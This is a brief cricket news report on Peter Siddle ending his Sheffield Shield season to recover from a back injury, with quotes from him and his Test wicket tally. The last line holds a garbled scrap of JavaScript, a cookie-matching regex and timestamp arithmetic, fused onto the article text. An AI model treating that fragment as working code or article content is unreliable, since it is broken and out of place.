Australian paceman Peter Siddle will take no further part in his side's push for the Sheffield Shield title.

Siddle, who has not played since injuring his back during the first Test of the Australian summer in November, initially hoped to return for the Vics' push for a third consecutive title.

However, the 32-year-old has now opted to focus on regaining full fitness and working on earning a recall to the national side, rather than risk further injury playing Shield cricket.

“Going forward and looking to next year, if I do too much more damage now it’s going to ruin the start of next season,” Siddle said.

“I’ve got to get it all right (so) I’ve got to pull the pin on the rest of this season which is disappointing.

“I haven’t played a lot of cricket in the last year. It’s a bit sad but I need to get the body right.”

Siddle has taken 211 Test wickets in 62 matches.

Victoria is currently top of the Shield ladder after eight matches. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
